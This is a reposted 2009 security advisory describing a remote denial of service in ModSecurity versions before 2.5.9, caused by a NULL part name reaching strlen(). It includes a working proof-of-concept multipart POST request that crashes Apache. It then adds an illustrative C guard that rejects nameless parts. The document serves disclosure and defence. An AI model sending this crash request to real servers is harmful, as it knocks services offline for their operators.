
      ModSecurity < 2.5.9 is vulnerable to a remote Denial of Service (DoS)

      Saturday, March 21, 2009, 22:41
=============================================
INTERNET SECURITY AUDITORS ALERT 2009-001
- Original release date: February 25th, 2009
- Last revised: March 19th, 2009
- Discovered by: Juan Galiana Lara
- Severity: 7.8/10 (CVSS Base Score)
=============================================

I. VULNERABILITY
-------------------------
ModSecurity < 2.5.9 is vulnerable to a remote Denial of Service (DoS)

II. BACKGROUND
-------------------------
ModSecurity is the most widely-deployed web application firewall in the world, with more than 15,000 users. It runs as an Apache web server module and is developed by Breach Security [ http://www.breach.com ]. It is available under the GNU GPL and many other commercial licenses.

III. DESCRIPTION
-------------------------
The multipart processor of ModSecurity does not sufficiently sanitize user-supplied input. An attacker can therefore send a crafted POST request of type multipart/form-data that leads to a remote denial of service.

The snippet of vulnerable code, in file msc_multipart.c:

    1256 int multipart_get_arguments(modsec_rec *msr, char *origin, apr_table_t *arguments) {
    1257     multipart_part **parts;
    1258     int i;
    1259
    1260     parts = (multipart_part **)msr->mpd->parts->elts;
    1261     for(i = 0; i < msr->mpd->parts->nelts; i++) {
    1262         if (parts[i]->type == MULTIPART_FORMDATA) {
    1263             msc_arg *arg = (msc_arg *)apr_pcalloc(msr->mp, sizeof(msc_arg));
    1264             if (arg == NULL) return -1;
    1265
    1266             arg->name = parts[i]->name;
    1267             arg->name_len = strlen(parts[i]->name);

On line 1267, because the pointer parts[i]->name is not properly sanitized, the strlen function is called with a NULL argument. This causes a segmentation fault and crashes the Apache process that handles the request.

IV. PROOF OF CONCEPT
-------------------------
The process could be crashed remotely by sending:

    POST / HTTP/1.0
    Content-Type: multipart/form-data; boundary=---------------------------xxxxxxxxxxxxxx
    Content-Length: 91

    -----------------------------xxxxxxxxxxxxxx
    :
    -----------------------------xxxxxxxxxxxxxx--

In order to send a correct HTTP/1.1 request you must add a valid Host header.

With the configuration directives:

    SecAuditEngine On
    SecDebugLogLevel 9

After the attack, the last line of the debug logfile is:

    [25/Feb/2009:09:51:18 +0100] [vhost/sid#884348][rid#aaf0d8][/][9] Multipart: Added part abe458 to the list: name "(null)" (offset 0, length 0)

V. BUSINESS IMPACT
-------------------------
An attacker could cause a remote denial of service against an Apache installation with the ModSecurity 2 module.

VI. SYSTEMS AFFECTED
-------------------------
ModSecurity versions between 2.5.5 and 2.5.8 are vulnerable; other versions may be affected. Tested with Apache httpd 2.2.11.
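
Added example, not part of the advisory and not ModSecurity's own code: a self-contained C version of the guard that is missing before line 1267, where a form-data part without a name is rejected and reported instead of reaching strlen(). The types part_t and arg_t, the functions collect_arguments() and demo(), and the sample parts are hypothetical stand-ins constructed for this illustration; the fix actually shipped by the project may differ.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Simplified stand-ins for multipart_part and msc_arg (hypothetical layouts). */
enum { PART_FORMDATA = 1 };
typedef struct { int type; const char *name; const char *value; } part_t;
typedef struct { const char *name; size_t name_len;
                 const char *value; size_t value_len; } arg_t;

/* Copy form-data parts into out[] and return the number stored. Returns -1
 * with *bad_index set when a part has no name, so NULL never reaches strlen(). */
int collect_arguments(const part_t *parts, int nparts,
                      arg_t *out, int out_cap, int *bad_index)
{
    int n = 0;
    *bad_index = -1;
    for (int i = 0; i < nparts; i++) {
        if (parts[i].type != PART_FORMDATA) continue;
        if (parts[i].name == NULL) {   /* the check absent before line 1267 */
            *bad_index = i;
            return -1;
        }
        if (n >= out_cap) return -1;   /* output array full */
        out[n].name = parts[i].name;
        out[n].name_len = strlen(parts[i].name);
        out[n].value = parts[i].value ? parts[i].value : "";
        out[n].value_len = strlen(out[n].value);
        n++;
    }
    return n;
}

/* Constructed sample input. With nameless != 0 the second part has no name, like
 * the part logged as name "(null)". Returns the count, or -(index + 1) if rejected. */
int demo(int nameless)
{
    const part_t parts[] = { { PART_FORMDATA, "user", "alice" },
                             { PART_FORMDATA, nameless ? NULL : "note", "" } };
    arg_t args[4]; int bad;
    int rc = collect_arguments(parts, 2, args, 4, &bad);
    return rc >= 0 ? rc : -(bad + 1);
}

int main(void)
{
    printf("well-formed: %d, nameless part: %d\n", demo(0), demo(1));
    return 0;
}
```

Returning the index of the rejected part lets the caller log which part was malformed and refuse the request rather than continue processing it.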

       
